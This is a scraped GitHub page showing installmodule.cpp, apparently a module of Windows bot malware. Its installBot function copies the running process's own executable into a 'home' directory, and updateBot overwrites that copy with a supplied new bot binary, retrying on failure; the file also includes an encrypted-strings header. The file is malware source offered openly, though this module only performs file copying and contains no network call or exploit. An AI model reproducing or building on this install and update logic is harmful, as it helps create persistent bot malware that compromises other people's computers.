-
Notifications
You must be signed in to change notification settings - Fork 2
/
Copy pathinstallmodule.cpp
102 lines (80 loc) · 2.16 KB
/
installmodule.cpp
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
#include "stdafx.h"
#include "kernel.h"
#include "installmodule.h"
#include "filesystem.h"
#include "cryptedstrings.h"
void InstallModule::init()
{
}
void InstallModule::uninit()
{
}
static bool saveFileWithRetry(LPWSTR path, BYTE * data, DWORD dataSize, int maxRetry)
{
for (int loop = 0;; loop++)
{
if (FileSystem::saveDataToFile(path, data, dataSize))
{
return true;
}
else
{
WDEBUG0(WDDT_ERROR, "Failed to save file : " << path);
if (maxRetry >= 0 && maxRetry <= loop)break;
}
Sleep(5000 + loop);
}
return false;
}
static bool saveCoreFile(const LPWSTR filePath, int maxRetry)
{
FileSystem::memory_file_t memoryFile;
if (FileSystem::fileToMemory(kernelData.paths.process, &memoryFile))
{
bool result = saveFileWithRetry(filePath, memoryFile.data, memoryFile.size, maxRetry);
FileSystem::closeMemoryFile(&memoryFile);
return result;
}
return false;
}
bool InstallModule::installBot(LPWSTR coreFile)
{
WCHAR path[MAX_PATH];
WCHAR directory[MAX_PATH];
if (!FileSystem::combinePath(path, kernelData.paths.home, coreFile)) return false;
wcscpy_s(directory, path);
PathRemoveFileSpec(directory);
if (GetFileAttributes(directory) == INVALID_FILE_ATTRIBUTES)
{
if (!FileSystem::createDirectoryTree(directory, NULL)) return false;
}
HANDLE file = CreateFile(path, GENERIC_WRITE | GENERIC_READ, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
if (file != INVALID_HANDLE_VALUE)
{
CloseHandle(file);
return saveCoreFile(path, 10);
}
return false;
}
bool InstallModule::updateBot(LPWSTR coreFile, BYTE * newBot, DWORD newBotSize)
{
WCHAR path[MAX_PATH];
WCHAR directory[MAX_PATH];
if (!FileSystem::combinePath(path, kernelData.paths.home, coreFile)) return false;
wcscpy_s(directory, path);
PathRemoveFileSpec(directory);
if (GetFileAttributes(directory) == INVALID_FILE_ATTRIBUTES)
{
if (!FileSystem::createDirectoryTree(directory, NULL)) return false;
}
HANDLE file = CreateFile(path, GENERIC_WRITE | GENERIC_READ, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
if (file != INVALID_HANDLE_VALUE)
{
CloseHandle(file);
if (saveFileWithRetry(path, newBot, newBotSize, 10))
{
return true;
}
}
return false;
}